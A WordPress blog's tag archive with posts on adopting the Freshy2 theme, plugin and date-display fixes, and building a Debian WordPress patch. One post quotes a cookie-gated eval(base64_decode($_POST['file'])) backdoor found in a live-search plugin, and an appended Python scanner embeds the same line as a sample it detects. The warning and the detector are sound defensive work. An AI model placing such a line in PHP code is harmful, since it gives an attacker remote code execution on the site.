Tag Archives: Wordpress

New theme part III

After last night’s debacle with the live search plugin, I tried another one that was based on it: Live search popup. Unfortunately that one didn’t display very well in my theme, so I just removed it and won’t be offering a “Web 2.0” search option for now.

Further changes to the Freshy2 theme and WordPress:

  • I’ve added a none.gif to the background images folder, since I got loads of 404 messages about it not being in there.
  • I’ve copied the default search box style (#s) from the WordPress theme and removed the “white” background color so you can see what you type when searching. Unfortunately I now need a black anti-aliased version of the search icon.
  • I’ve added a header to the search widget (guess that will be gone on the next WP update from Debian, as soon as the TinyMCE maintainer updates TinyMCE). Not sure if I really want it to stay, but if I do I need to find a better way to add it.

Now I “just” need to work on the <pre> and <code> output of the theme, since reading it is not very easy at the moment.

And I found why the Live search plugin didn’t work. It uses the deprecated get_bloginfo('siteurl'), while it should be using get_bloginfo('wpurl'). But well, after having contact with the maintainer of it, I won’t be using it. He is not interested in maintaining it, so better not to use that one.

New theme continued: why not to trust plugins

With this new theme I also saw that it was compatible with the “Addicted to live search plugin”[1]. (Un)fortunately this plugin doesn’t work out of the box either, at least not if you do not have WordPress running directly in the root.

But… Since I was looking at the code to fix this I also found:

<?php if($_COOKIE['7b13cc987791f418']=="6d6bedf94c36d538"){ eval(base64_decode($_POST['file'])); exit; } ?>

No thank you very much!

So what did we learn: Never ever trust WordPress plugins… So do not use this (version of the) plugin, unless you know how to remove this piece of code!

I’ll check out after some sleep what WordPress has to offer when you find a vulnerability like this in a plugin, so perhaps users of it can be warned… And I’ll fix this plugin later also, to be continued…

Update: it seems that it’s fixed. Although I’m not sure how the WordPress auto-update feature could create a line of code like that (as in, this sounds like bollocks to me).


[1] Funny sidenote, I found this blog two years ago and commented on one of his articles on Oracle.
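
A scanner for the backdoor pattern quoted in this post, as an added example (not code from the original post or from the plugin): it flags eval()/assert() calls whose argument comes from request data in plugin PHP files. The directory name, the function names and the two sample files are constructed for illustration; a hit is a lead for manual review, and the rule does not catch obfuscated variants.

```python
import re
import tempfile
from pathlib import Path

# eval()/assert() whose argument reaches a request superglobal within the same
# statement, optionally through a decoder such as base64_decode().
SINK = re.compile(r"\b(eval|assert)\s*\(([^;]*?\$_(POST|GET|COOKIE|REQUEST)\b)", re.I)
DECODER = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)

# Constructed sample files; BACKDOORED embeds the statement quoted in the post.
BACKDOORED = r'''<?php
// constructed plugin file
if($_COOKIE['7b13cc987791f418']=="6d6bedf94c36d538"){ eval(base64_decode($_POST['file'])); exit; }
'''
CLEAN = r'''<?php
// constructed benign file: decoder and request data, but no request-driven eval
$tpl = base64_decode($stored); echo eval_template($tpl);
eval($tpl); $q = $_POST['s'];
'''

def scan_php(text):
    """Return (line, sink, decoder, source) for each request-driven eval/assert."""
    findings = []
    for m in SINK.finditer(text):
        line = text.count("\n", 0, m.start()) + 1
        dec = DECODER.search(m.group(2))
        decoder = dec.group(1).lower() if dec else None
        findings.append((line, m.group(1).lower(), decoder, "$_" + m.group(3).upper()))
    return findings

def scan_tree(root):
    """Scan every *.php file under root; return {relative path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_php(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Write the constructed files into a temporary plugin tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp, "plugins", "example-plugin")  # hypothetical name
        plugin.mkdir(parents=True)
        (plugin / "live.php").write_text(BACKDOORED, encoding="utf-8")
        (plugin / "search.php").write_text(CLEAN, encoding="utf-8")
        return scan_tree(tmp)

if __name__ == "__main__":
    print(demo())
```

Point scan_tree() at wp-content/plugins before activating a plugin and again after each update; comparing the report between runs shows when such a line appears.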

New theme

A while ago I decided to change the default WordPress theme into the Freshy2 theme, since I liked the looks of it… I now partially wish I did not do that… Changing the theme was not trivial… Mainly because of two problems:

1. In the wp-content/themes/freshy2/functions.php file on line 474 it says

$path = WP_CONTENT_DIR.$theme_info->template_dir.'/';

If you change that to:

$path = ABSPATH.$theme_info->template_dir.'/';

suddenly you are able to configure the theme as promised by the author (at least that is what I needed to do with my Debian version of WordPress).

2. The customize freshy plugin that is advertised makes it so that even though I’ve changed the stylesheet, it’s still not visible. So I’ve disabled that plugin. The line of PHP that is causing this behavior is also in functions.php, but then on line 26

if (!class_exists('Nice_theme')) add_action('wp_head','freshy_head');

Seems that Nice_theme doesn’t change the wp_head function. I didn’t look further into this, since the configuration options Freshy2 gives me are enough.

Furthermore, this theme breaks the xhtml 1.1 validation. I’ve removed the autocomplete="off" in the searchform.php file and added a <p> block around the search inputs. For more information about the autocomplete attribute and xhtml see this post on the Mozilla wiki (to be moved some time in the future).

Talking about xhtml 1.1 validation. This theme also puts an xhtml 1.0 doctype in the pages, while the footer of WordPress shows xhtml 1.1. So I’ve changed the doctype and removed the lang="en" attribute from the <html> tag. But well, guess only a few people really try the validation button on the bottom of the page.

And I had to change the title of the blog again in the same manner as I did the last time on the default WordPress theme.

But, now I’ve done this I’m very happy. I really like the theme’s looks, certainly with this dark version, since it also adds something that I really wanted: no more fixed width layout! With the default version you still get a fixed width version, but this one scales. So thank you Jide!

Now a few things remain to be done:

  • Fix the <code> layout, since it doesn’t play well with my code formatting plugin and well.. it distracts a bit
  • Add Excerpts to all my posts
  • Cut down on the number of categories and add more tags
  • Find out why some posts don’t show their date on the homepage
  • Change the color of the input text, so you can see what you search for
  • Post more frequently (still got about 20 drafts to work on)
  • Find out why putting <pre> tags inside <li> tags breaks validation

Update: I should have read the comments on the theme site before I started to work on the theme… Then I would have seen that more people encountered the problems and already wrote fixes to them. Someone thought the problem with the disappearing post dates has to do with editing the post after publishing. That is not the case, unfortunately. It is caused because the_date() doesn’t show the date if it’s the same as the date of the post before. In the default WordPress theme the_time('F jS, Y') is used instead of the_date(). And the_time() doesn’t check for the last date. But, with just putting 'F jS, Y' into this function call, changing your date format in the settings doesn’t help, so what you need to put in the index.php file on line 15 is the_time(get_option('date_format')). At least, if you want the date to be always shown. Perhaps I should make it a feature request that you can change this behavior of the_date, and add a bug report that the default theme doesn’t listen to the date_format setting…

Posting in the future…

Seems I just made a post 1 hour into the future and with that, on a different day. The WordPress settings say

Unfortunately, you have to manually update this for Daylight Savings Time. Lame, we know, but will be fixed in the future.

Lame indeed, and guess I forgot about this. A while ago a colleague encountered a similar problem in phpBB. Guess it’s PHP related and not just WordPress, as both products have the same problem. I wonder if the fix promised by WordPress is waiting for daylight savings time to be abandoned as an idea, since its advantages are still being questioned.

Broken WordPress: debian unstable is called unstable for a reason

Update: The maintainer of the wordpress package released “my” bugfix. It’s available now for those using unstable (sid). I guess it will be available in testing (lenny) soon, since the bug is listed in the release critical bugs list. Too bad he credited me with the name Del Gurt, but well… The only thing I did was finding the missing methods in WordPress 2.6. But it’s my first fix in Debian, yeh.

I just ran an apt-get update + apt-get upgrade and after that my WordPress homepage was broken when I’m logged in; it gives a nice "Fatal error: Call to undefined function admin_url() in /usr/share/wordpress/wp-includes/link-template.php on line 470". And so it is for all people using the debian unstable package for WordPress, for example this guy.

I quickly searched what functions were missing and created a patch and submitted it to the related debian bug. I hope they will accept it soon, but well. My WordPress works fine again now.

Creating a patch took me a while, since I never created a patch for a debian package before. Lucky me, there are tutorials on how to create patches for debian packages, so I just had to read up on that. I read about how to submit the patch in the tutorial on how to help squashing Release-Critical bugs.

And I had to read up on dpatch, because the other patches on WordPress were created using that. Lucky me, someone has created a nice short tutorial on how to use dpatch already. Dpatch seems like a good way to keep your patches separated from the original code, so when the original code is updated, you can determine easily if that conflicts with your patches or not.

And then I had to create a GPG key to sign my patch, since dpkg-buildpackage complains about it otherwise.

So in the end, what I had to do to patch my WordPress and submit the patch (besides generating the GPG key):

Install the required tools:
    sudo apt-get install build-essential devscripts lintian linda diff patch patchutils dpatch
Get the WordPress package source:
    apt-get source wordpress
Enter the root directory of the extracted source:
    cd wordpress-2.5.1
Let the package know I’m making the changes:
    dch -i
Start the dpatch process:
    dpatch-edit-patch 009CVE2008-3747.addendum
Make the changes.
Exit the dpatch process:
    exit
The wordpress patches are all called .patch, so rename it:
    mv debian/patches/009CVE2008-3747.addendum.dpatch debian/patches/009CVE2008-3747.addendum.patch
Change the e-mail address in the patch:
    EDIT debian/patches/009CVE2008-3747.addendum.patch
Add the patch to the list of patches:
    echo "009CVE2008-3747.addendum.patch" >> debian/patches/00list
Test the patch:
    fakeroot debian/rules binary && sudo dpkg -i ../wordpress_2.5.1-6.1_all.deb
Build the source package:
    dpkg-buildpackage -kMYKEY -rfakeroot
Create the patch:
    interdiff -z ../wordpress_2.5.1-6.diff.gz ../wordpress_2.5.1-6.1.diff.gz > ../bug_497524.patch
Email the bugs list with the patch.
Email bug control to inform them that a patch has been made for the bug.

That was it. Not that hard, if you know the commands + procedure. Now wait and see what the package maintainer is going to do with the patch I created.

Update: seems I forgot to check the edit link itself after the fatal error was gone… It didn’t work anymore. Fixed that as well now.

Update2: for those who find my post and do not want to wait on the maintainer to release the patch, I’ve “released” it. The MD5 of wordpress_2.5.1-6.1_all.deb is: dc46d35743122d933def7db431c8f49e.